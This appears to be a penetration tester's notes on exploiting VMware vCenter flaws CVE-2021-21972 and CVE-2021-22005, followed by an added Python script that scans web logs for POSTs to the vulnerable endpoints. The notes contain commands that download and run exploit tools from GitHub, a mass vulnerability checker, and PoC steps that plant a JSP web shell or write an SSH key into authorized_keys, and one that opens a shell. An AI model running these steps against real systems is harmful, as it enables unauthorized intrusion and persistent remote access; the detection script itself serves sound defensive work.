CVE-2021-44228


CVE-2021-21972

Research credit to:
https://swarm.ptsecurity.com/unauth-rce-vmware/
http://noahblog.360.cn/vcenter-6-5-7-0-rce-lou-dong-fen-xi/

horizon3ai/CVE-2021-21972

This script checks for CVE-2021-21972 by sending a POST request to the path "/ui/vropspluginui/rest/services/uploadova" and looking for the word "uploadFile" in the (HTTP 500) response body; finding it means the vCenter accepts files via POST without any restrictions.

NMAP Checker:

wget https://raw.githubusercontent.com/alt3kx/CVE-2021-21972/main/CVE-2021-21972.nse
sudo nmap -p443 --script ~/CVE/CVE-2021-21972/CVE-2021-21972.nse 10.1.43.11

Manual inspection:

curl -i -s -k -X $'GET' -H $'Host: 10.1.43.11' -H $'User-Agent: clevergod' $'https://10.1.43.11/ui/vropspluginui/rest/services/getstatus'
curl -i -s -k -X $'GET' -H $'Host: 10.1.43.11' -H $'User-Agent: clevergod' $'https://10.1.43.11/ui/vropspluginui/rest/services/uploadova'
curl -i -s -k -X $'POST' -H $'Host: 10.1.43.11' -H $'User-Agent: clevergod' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 0' $'https://10.1.43.11/ui/vropspluginui/rest/services/uploadova'

PoC:

git clone https://github.com/horizon3ai/CVE-2021-21972.git; cd CVE-2021-21972; chmod +x CVE-2021-21972.py
#WINDOWS
python3 CVE-2021-21972.py -t 10.1.43.11 -f cmdjsp.jsp -p 'ProgramData\\VMWare\\vCenterServer\\data\\perfcharts\\tc-instance\\webapps\\statreport\\cmdjsp.jsp' -o win
#LINUX
python3 CVE-2021-21972.py -t 10.1.43.11 -f /home/clevergod/.ssh/id_rsa.pub -p /home/vsphere-ui/.ssh/authorized_keys -o unix
ssh 10.1.43.11 -l vsphere-ui

CVE-2021-22005

One-liner mass checker:

cat vmware_centers.txt | while read S; do curl --connect-timeout 15 --max-time 30 --silent --insecure --user-agent "vAPI/2.100.0 Java/1.8.0_261 (Linux; 4.19.160-6.ph3; amd64)" -X POST "https://$S/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "lorem ipsum" -H "Content-Type: application/json" -L --stderr - -v | tac | grep -q "HTTP/1.1 201" && printf "$S \033[1;35mVulnerable\e[0m\n" || printf "$S \033[1;32mPatched\e[0m\n"; done

PoC:

wget https://github.com/r0ckysec/CVE-2021-22005/raw/main/exp/cve-2021-22005_exp_linux; chmod +x cve-2021-22005_exp_linux;
./cve-2021-22005_exp_linux -u https://URL --shell
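Detection side, as an added example that is not part of the original notes nor of the horizon3ai / r0ckysec tooling: both checkers above hinge on a POST reaching one of two unauthenticated paths, so the same paths are the thing to hunt for in web access logs. The script below assumes a reverse proxy or WAF in front of vCenter writing Combined Log Format (vCenter's own rhttpproxy/Envoy logs use a different layout and would need a different regex), and flags POSTs to the CVE-2021-21972 upload endpoint and the CVE-2021-22005 telemetry endpoint regardless of status code, since a 500 on the upload path is exactly what the checker treats as the vulnerable signature. The sample log lines are constructed.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Request paths named in the notes above as the entry point of each CVE.
WATCHED_PATHS = {
    "/ui/vropspluginui/rest/services/uploadova": "CVE-2021-21972",
    "/analytics/telemetry/ph/api/hyper/send": "CVE-2021-22005",
}

# Combined Log Format (assumption: a proxy in front of vCenter logs this way):
# src ident user [time] "METHOD PATH PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


@dataclass
class Hit:
    cve: str
    src: str
    time: str
    path: str
    status: int
    ua: str


def classify(line: str) -> Optional[Hit]:
    """Return a Hit if the line is a POST to one of the watched paths, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not in the expected log format; skip rather than guess
    # Strip the query string (e.g. the ?_c&_i=... seen on the telemetry path)
    # so the comparison is on the route alone.
    path = m.group("path").split("?", 1)[0]
    cve = WATCHED_PATHS.get(path)
    if cve is None or m.group("method") != "POST":
        return None
    return Hit(cve, m.group("src"), m.group("time"), path,
               int(m.group("status")), m.group("ua"))


def scan(lines: Iterable[str]) -> List[Hit]:
    """Run classify() over every line and keep the hits, in log order."""
    return [h for h in (classify(line) for line in lines) if h is not None]


def summarize(hits: Iterable[Hit]) -> dict:
    """Count hits per CVE, e.g. {'CVE-2021-21972': 1}."""
    counts: dict = {}
    for h in hits:
        counts[h.cve] = counts.get(h.cve, 0) + 1
    return counts


# Constructed sample log: one benign request, one GET probe of the plugin path
# (the manual-inspection step above; not flagged), then one POST to each endpoint.
SAMPLE_LOG = [
    '10.1.43.50 - - [10/Dec/2021:10:00:01 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:05 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 405 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:06 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 500 1337 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:10:01:00 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 201 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.time} {hit.src} -> {hit.cve} POST {hit.path} status={hit.status} ua={hit.ua!r}")
    print(summarize(scan(SAMPLE_LOG)))
```

Feed it real lines with `scan(open("access.log"))`; a 201 on the telemetry path or any POST reaching the upload path from a source that is not a known vCenter client is worth an immediate look, and on a patched host those POSTs should not be returning 201/500 at all.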